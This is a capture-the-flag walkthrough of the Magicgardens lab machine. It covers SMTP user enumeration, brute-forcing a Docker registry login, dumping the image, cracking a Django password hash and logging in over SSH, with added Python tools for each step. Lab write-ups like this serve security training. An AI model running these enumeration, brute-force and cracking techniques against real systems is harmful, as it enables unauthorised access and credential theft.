Magicgardens

OS: Linux
Difficulty: Insane
Points: 50

Nmap

nmap -v -p 22,25,80,1337,5000 -sV -sC -oN nmap.txt --min-rate=5000 10.129.93.221
Nmap scan report for 10.129.93.221
Host is up (0.14s latency).

PORT     STATE SERVICE  VERSION
22/tcp   open  ssh      OpenSSH 9.2p1 Debian 2+deb12u2 (protocol 2.0)
| ssh-hostkey: 
|   256 e0:72:62:48:99:33:4f:fc:59:f8:6c:05:59:db:a7:7b (ECDSA)
|_  256 62:c6:35:7e:82:3e:b1:0f:9b:6f:5b:ea:fe:c5:85:9a (ED25519)
25/tcp   open  smtp?
|_smtp-commands: Couldn't establish connection on port 25
80/tcp   open  http     nginx 1.22.1
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-title: Did not follow redirect to http://magicgardens.htb/
|_http-server-header: nginx/1.22.1
1337/tcp open  waste?
| fingerprint-strings: 
|   DNSStatusRequestTCP, DNSVersionBindReqTCP, FourOhFourRequest, GenericLines, GetRequest, HTTPOptions, Help, JavaRMI, LANDesk-RC, LDAPBindReq, LDAPSearchReq, LPDString, NCP, NotesRPC, RPCCheck, RTSPRequest, TerminalServer, TerminalServerCookie, X11Probe, afp, giop, ms-sql-s: 
|_    [x] Handshake error
5000/tcp open  ssl/http Docker Registry (API: 2.0)
| ssl-cert: Subject: organizationName=Internet Widgits Pty Ltd/stateOrProvinceName=Some-State/countryName=AU
| Issuer: organizationName=Internet Widgits Pty Ltd/stateOrProvinceName=Some-State/countryName=AU
| Public Key type: rsa
| Public Key bits: 4096
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2023-05-23T11:57:43
| Not valid after:  2024-05-22T11:57:43
| MD5:   2f97:8372:17ae:abe4:a4d9:5937:f438:3e71
|_SHA-1: a6f9:ce07:c808:150a:00aa:f193:1b72:a963:f414:f57c
|_http-title: Site doesn't have a title.
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS

Enumeration

We enumerate users through the SMTP service with Metasploit's smtp_enum module, which asks the server about each candidate name with VRFY and reports the ones it accepts.

https://book.hacktricks.xyz/network-services-pentesting/pentesting-smtp#automatic-tools

msfconsole
use auxiliary/scanner/smtp/smtp_enum
set rhosts magicgardens.htb
set user_file /usr/share/seclists/Usernames/Names/names.txt
run

With the module's default user list we find the following users. All of them are Debian system accounts that Postfix accepts as local recipients: they confirm that VRFY leaks account existence, but they are not login targets.

[+] 10.129.93.221:25      - 10.129.93.221:25 Users found: , _apt, avahi-autoipd, backup, bin, daemon, games, irc, list, lp, mail, man, messagebus, news, nobody, postfix, postmaster, proxy, sshd, sync, sys, systemd-network, uucp, www-data

Using the larger SecLists names list (the user_file set above) we find the following valid, non-system user.

[+] 10.129.93.221:25      - 10.129.93.221:25 Users found: alex
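As an added example (my code, not the writeup's and not Metasploit's), the following Python reproduces what smtp_enum does with VRFY and makes the reply-code logic explicit: 252 is the positive answer this Postfix gives for a local recipient, 550 the negative one, and the Debian system accounts from the default-list run are filtered out so that only a real user such as alex remains. The replies in FAKE_REPLIES are constructed for offline testing; enumerate_over_smtp is the live version and assumes the target still answers VRFY on port 25.

```python
import smtplib
from typing import Callable, Dict, Iterable, Tuple

# VRFY reply classes (RFC 5321, section 3.5.1). Postfix answers an existing
# local recipient with 252 ("cannot VRFY user, but will accept message") and
# an unknown one with 550, so on this target 252 is the positive signal.
VALID = {250, 251}
PROBABLE = {252}
INVALID = {550, 551, 553}

# Accounts the writeup's default-list run reported: Debian system users that
# Postfix accepts as local recipients, i.e. noise for credential attacks.
SYSTEM_ACCOUNTS = frozenset({
    "_apt", "avahi-autoipd", "backup", "bin", "daemon", "games", "irc", "list",
    "lp", "mail", "man", "messagebus", "news", "nobody", "postfix", "postmaster",
    "proxy", "sshd", "sync", "sys", "systemd-network", "uucp", "www-data", "",
})


def classify_vrfy(code: int) -> str:
    """Map an SMTP reply code to a verdict about the probed name."""
    if code in VALID:
        return "valid"
    if code in PROBABLE:
        return "probable"
    if code in INVALID:
        return "invalid"
    return "unknown"  # e.g. 502 (VRFY disabled) or 421 (rate limited)


def enumerate_users(verify: Callable[[str], Tuple[int, bytes]],
                    candidates: Iterable[str]) -> Dict[str, str]:
    """VRFY every candidate through `verify` (same shape as smtplib.SMTP.verify:
    name -> (code, message)) and keep the names the server did not reject."""
    found: Dict[str, str] = {}
    for name in candidates:
        code, _message = verify(name)
        verdict = classify_vrfy(code)
        if verdict in ("valid", "probable"):
            found[name] = verdict
    return found


def interesting(found: Dict[str, str]) -> Dict[str, str]:
    """Drop the system accounts so only real users (alex here) remain."""
    return {name: v for name, v in found.items() if name not in SYSTEM_ACCOUNTS}


def enumerate_over_smtp(host: str, candidates: Iterable[str],
                        port: int = 25, timeout: float = 10.0) -> Dict[str, str]:
    """Live version: one SMTP session, one VRFY per candidate. Usage:
    enumerate_over_smtp("magicgardens.htb", open("names.txt").read().split())"""
    with smtplib.SMTP(host, port, timeout=timeout) as smtp:
        smtp.ehlo_or_helo_if_needed()
        return interesting(enumerate_users(smtp.verify, candidates))


# Constructed replies modelled on Postfix (not captured from the box).
FAKE_REPLIES = {
    "alex": (252, b"2.0.0 alex"),
    "postmaster": (252, b"2.0.0 postmaster"),
    "www-data": (252, b"2.0.0 www-data"),
}


def fake_verify(name: str) -> Tuple[int, bytes]:
    """Stand-in for smtplib.SMTP.verify that answers from FAKE_REPLIES."""
    rejected = (b"5.1.1 <" + name.encode() +
                b">: Recipient address rejected: User unknown in local recipient table")
    return FAKE_REPLIES.get(name, (550, rejected))
```

The 252 verdict is only "probable" because on other MTAs it can mean "I never check recipients"; with Postfix the 252/550 split against the same session is what makes the enumeration reliable.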

Brute-forcing the Docker registry

Port 5000 is also a Docker registry. We have a username but no password, so we brute-force it: the registry protects /v2/ with HTTP Basic auth, and hydra's https-get module sends each candidate and reports the one that no longer gets a 401.

https://book.hacktricks.xyz/generic-methodologies-and-resources/brute-force#docker-registry

hydra -l alex  -P /usr/share/wordlists/rockyou.txt 10.129.93.221 -s 5000 https-get /v2/
[DATA] attacking http-gets://10.129.93.221:5000/v2/
[5000][http-get] host: 10.129.93.221   login: alex   password: diamonds
1 of 1 target successfully completed, 1 valid password found

Docker Registry Enumeration

Now we can access the registry.

┌──(root㉿kali)-[~/htb/MagicGardens]
└─# curl -k -u alex:diamonds https://10.129.93.221:5000/v2/_catalog
{"repositories":["magicgardens.htb"]}

┌──(root㉿kali)-[~/htb/MagicGardens]
└─# curl -k -u alex:diamonds https://10.129.93.221:5000/v2/magicgardens.htb/tags/list
{"name":"magicgardens.htb","tags":["1.3"]}

Next we pull the image, but first the Docker daemon has to be told to trust this registry: its certificate is self-signed (the nmap output shows OpenSSL's default "Internet Widgits Pty Ltd" subject), so docker pull would otherwise fail TLS verification. Create the file daemon.json with the following content.

/etc/docker/daemon.json
{
    "insecure-registries": ["10.129.93.221:5000"]
}

Restart the service.

┌──(root㉿kali)-[~/htb/MagicGardens]
└─# systemctl restart docker.service

Now we authenticate. The warning is worth heeding on a shared attack box: the password is written to /root/.docker/config.json merely base64-encoded.

┌──(root㉿kali)-[~/htb/MagicGardens]
└─# docker login --username=alex 10.129.93.221:5000
Password: 
WARNING! Your password will be stored unencrypted in /root/.docker/config.json.
Configure a credential helper to remove this warning. See
https://docs.docker.com/engine/reference/commandline/login/#credentials-store

Login Succeeded

Pull the image.

┌──(root㉿kali)-[~/htb/MagicGardens]
└─# docker pull 10.129.93.221:5000/magicgardens.htb:1.3
1.3: Pulling from magicgardens.htb
de4cac68b616: Pull complete 
d31b0195ec5f: Pull complete 
9b1fd34c30b7: Pull complete

Start a container from the image with an interactive shell to inspect its filesystem.

┌──(root㉿kali)-[~/htb/MagicGardens]
└─# docker run -it 10.129.93.221:5000/magicgardens.htb:1.3 bash

Extra

The layers can also be pulled without a Docker daemon, using DockerRegistryGrabber, which walks the registry API and downloads every blob the manifest references.

https://github.com/Syzik/DockerRegistryGrabber

┌──(root㉿kali)-[~/htb/MagicGardens/DockerRegistryGrabber]
└─# python3 drg.py https://10.129.93.221 -U alex -P diamonds --dump 'magicgardens.htb'
[+] BlobSum found 30
[+] Dumping magicgardens.htb
    [+] Downloading : a3ed95caeb02ffe68cdd9fd84406680ae93d633cb16422d00e8a7c22955b46d4
    [+] Downloading : a3ed95caeb02ffe68cdd9fd84406680ae93d633cb16422d00e8a7c22955b46d4
    [+] Downloading : b0c11cc482abe59dbeea1133c92720f7a3feca9c837d75fd76936b1c6243938c
    [+] Downloading : 748da8c1b87e668267b90ea305e2671b22d046dcfeb189152bf590d594c3b3fc

The files of interest are in the blob b0c11cc482abe59dbeea1133c92720f7a3feca9c837d75fd76936b1c6243938c. The repeated a3ed95ca... digest is the empty-layer placeholder that schema 1 manifests list for every metadata-only build step, which is why the tool counts 30 blobSums for an image docker pull fetched as 3 layers.
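As an added example serving both the docker pull and the DockerRegistryGrabber steps above (my code, not the tool's or the writeup's), the following Python client talks to the registry API directly with HTTP Basic auth over urllib: it checks credentials at /v2/, walks _catalog and tags/list, parses both manifest schemas and saves every referenced blob. FAKE_ROUTES holds constructed responses for offline testing; the host, port and credentials in the main block are the ones from the writeup.

```python
import base64
import json
import ssl
import urllib.error
import urllib.request
from pathlib import Path
from typing import Callable, List, Tuple

# fetch(path, accept) -> (http status, body)
Fetch = Callable[[str, str], Tuple[int, bytes]]

# Ask for a schema 2 manifest first, falling back to the signed schema 1 form.
MANIFEST_ACCEPT = ("application/vnd.docker.distribution.manifest.v2+json, "
                   "application/vnd.docker.distribution.manifest.v1+prettyjws")


def make_fetcher(base_url: str, user: str, password: str, verify_tls: bool = False) -> Fetch:
    """HTTP Basic client for a registry. TLS verification is off by default because
    this registry uses a self-signed certificate (the same thing curl -k and the
    insecure-registries setting work around)."""
    ctx = ssl.create_default_context()
    if not verify_tls:
        ctx.check_hostname = False
        ctx.verify_mode = ssl.CERT_NONE
    token = base64.b64encode(f"{user}:{password}".encode()).decode()

    def fetch(path: str, accept: str = "") -> Tuple[int, bytes]:
        req = urllib.request.Request(base_url + path,
                                     headers={"Authorization": "Basic " + token})
        if accept:
            req.add_header("Accept", accept)
        try:
            with urllib.request.urlopen(req, context=ctx, timeout=20) as resp:
                return resp.status, resp.read()
        except urllib.error.HTTPError as err:
            return err.code, err.read()
    return fetch


def credentials_valid(fetch: Fetch) -> bool:
    """/v2/ answers 200 once Basic auth is accepted and 401 otherwise, the same
    distinction hydra's https-get module relies on."""
    return fetch("/v2/", "")[0] == 200


def list_repositories(fetch: Fetch) -> List[str]:
    return json.loads(fetch("/v2/_catalog", "")[1])["repositories"]


def list_tags(fetch: Fetch, repo: str) -> List[str]:
    return json.loads(fetch(f"/v2/{repo}/tags/list", "")[1])["tags"]


def layer_digests(manifest: dict) -> List[str]:
    """Blob digests the manifest references, de-duplicated in order. Schema 1
    lists fsLayers[].blobSum and repeats the empty-layer digest (sha256:a3ed95ca...)
    for every metadata-only build step; schema 2 lists config.digest plus
    layers[].digest."""
    if manifest.get("schemaVersion") == 1:
        digests = [layer["blobSum"] for layer in manifest.get("fsLayers", [])]
    else:
        digests = [manifest["config"]["digest"]] if "config" in manifest else []
        digests += [layer["digest"] for layer in manifest.get("layers", [])]
    unique: List[str] = []
    for digest in digests:
        if digest not in unique:
            unique.append(digest)
    return unique


def dump_image(fetch: Fetch, repo: str, tag: str, outdir: str) -> List[str]:
    """Download every blob of repo:tag into outdir (layers are gzipped tars: extract
    with tar xzf and grep for secrets). Returns the paths written."""
    manifest = json.loads(fetch(f"/v2/{repo}/manifests/{tag}", MANIFEST_ACCEPT)[1])
    out = Path(outdir)
    out.mkdir(parents=True, exist_ok=True)
    written: List[str] = []
    for digest in layer_digests(manifest):
        status, blob = fetch(f"/v2/{repo}/blobs/{digest}", "")
        if status == 200:
            path = out / (digest.split(":", 1)[1] + ".tar.gz")
            path.write_bytes(blob)
            written.append(str(path))
    return written


# Constructed responses in the registry's shape (not captured from the box).
FAKE_ROUTES = {
    "/v2/": (200, b"{}"),
    "/v2/_catalog": (200, b'{"repositories":["magicgardens.htb"]}'),
    "/v2/magicgardens.htb/tags/list": (200, b'{"name":"magicgardens.htb","tags":["1.3"]}'),
}


def fake_fetch(path: str, accept: str = "") -> Tuple[int, bytes]:
    return FAKE_ROUTES.get(path, (401, b""))


if __name__ == "__main__":
    live = make_fetcher("https://10.129.93.221:5000", "alex", "diamonds")
    if credentials_valid(live):
        for repo in list_repositories(live):
            for tag in list_tags(live, repo):
                print(dump_image(live, repo, tag, f"dump/{repo}_{tag}"))
```

Because the blobs are content-addressed, a downloaded file can be checked with sha256sum against its digest before anything is extracted from it.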

Cracking the Django hash

Among the files is db.sqlite3, the Django database; looking through its rows (Django keeps accounts in the auth_user table) we get a password hash that hashcat can crack. The pbkdf2_sha256$iterations$salt$digest encoding is Django's PBKDF2 hasher, hashcat mode 10000.

┌──(root㉿kali)-[~/htb/MagicGardens]
└─# hashcat -m 10000 hash.txt /usr/share/wordlists/rockyou.txt

Dictionary cache hit:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344385
* Bytes.....: 139921507
* Keyspace..: 14344385

pbkdf2_sha256$600000$y1tAjUmiqLtSdpL2wL3h56$61u2yMfK3oYgnL31fX8R4k/0hTc6YXRfiOH4LYVsEXo=:jonasbrothers
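As an added example (my code, not the writeup's), the following Python shows where the hash lives and what hashcat is computing: it pulls username/hash pairs from an auth_user table (build_sample_db is a constructed stand-in for db.sqlite3 holding the recovered hash), parses Django's pbkdf2_sha256 encoding, verifies a password against it and runs a toy dictionary attack. PAGE_HASH is the hash from the dump; the low iteration count and fixed salt used when generating test hashes are assumptions chosen for speed.

```python
import base64
import hashlib
import hmac
import secrets
import sqlite3
import string
from typing import Iterable, List, Optional, Tuple

# Django's PBKDF2PasswordHasher stores algorithm$iterations$salt$base64(dk);
# hashcat -m 10000 consumes this string unchanged, one hash per line.
ALGORITHM = "pbkdf2_sha256"
ITERATIONS = 600000  # the count in the recovered hash (Django 4.2's default)

# The hash recovered from db.sqlite3 in the writeup (user morty).
PAGE_HASH = ("pbkdf2_sha256$600000$y1tAjUmiqLtSdpL2wL3h56$"
             "61u2yMfK3oYgnL31fX8R4k/0hTc6YXRfiOH4LYVsEXo=")


def build_sample_db() -> sqlite3.Connection:
    """Constructed stand-in for db.sqlite3 with a subset of auth_user's columns."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE auth_user (id INTEGER PRIMARY KEY, password TEXT, "
                 "username TEXT, is_superuser INTEGER)")
    conn.execute("INSERT INTO auth_user VALUES (1, ?, 'morty', 1)", (PAGE_HASH,))
    return conn


def extract_hashes(conn: sqlite3.Connection) -> List[Tuple[str, str]]:
    """username/hash pairs; the hashes written one per line are hashcat's input."""
    return [(u, p) for u, p in conn.execute("SELECT username, password FROM auth_user")]


def parse_django_hash(encoded: str) -> Tuple[int, str, bytes]:
    algorithm, iterations, salt, digest = encoded.split("$", 3)
    if algorithm != ALGORITHM:
        raise ValueError(f"unsupported hasher {algorithm!r}")
    return int(iterations), salt, base64.b64decode(digest)


def make_django_hash(password: str, salt: Optional[str] = None,
                     iterations: int = ITERATIONS) -> str:
    """Produce a hash Django itself would accept (22-char alphanumeric salt)."""
    if salt is None:
        alphabet = string.ascii_letters + string.digits
        salt = "".join(secrets.choice(alphabet) for _ in range(22))
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(), salt.encode(), iterations)
    return f"{ALGORITHM}${iterations}${salt}${base64.b64encode(dk).decode()}"


def verify_django_hash(encoded: str, password: str) -> bool:
    """Constant-time comparison, as Django's check_password does."""
    iterations, salt, expected = parse_django_hash(encoded)
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(), salt.encode(), iterations)
    return hmac.compare_digest(dk, expected)


def crack_django_hash(encoded: str, wordlist: Iterable[str]) -> Optional[str]:
    """Dictionary attack in pure Python: fine for a short list, but at 600000
    iterations per guess rockyou is a job for hashcat, as in the writeup."""
    for line in wordlist:
        candidate = line.rstrip("\r\n")
        if verify_django_hash(encoded, candidate):
            return candidate
    return None


if __name__ == "__main__":
    for username, encoded in extract_hashes(build_sample_db()):
        print(username, encoded)
    # Re-check hashcat's result against the recovered hash.
    print("jonasbrothers verifies:", verify_django_hash(PAGE_HASH, "jonasbrothers"))
```

The iteration count is embedded in the hash, so hashcat's speed on this format depends on the Django version that created it; 600000 rounds is roughly 20 times slower per guess than the 30000 of older Django releases.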

With it we can log in to the admin portal.

http://magicgardens.htb/admin/
morty : jonasbrothers

The same credentials also work over SSH.

┌──(root㉿kali)-[~/htb/MagicGardens/DockerRegistryGrabber]
└─# ssh morty@10.129.93.221
morty@10.129.93.221's password: 
Linux magicgardens 6.1.0-20-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.85-1 (2024-04-11) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Wed May 22 12:27:10 2024 from 10.10.14.218
morty@magicgardens:~$ id
uid=1001(morty) gid=1001(morty) groups=1001(morty)
morty@magicgardens:~$

Lateral Movement

scp morty@10.129.93.221:/usr/local/bin/harvest .
/tmp/rust_mozprofile4JM7iP/storage/ls-archive.sqlite
/var/lib/postfix/smtp_scache.db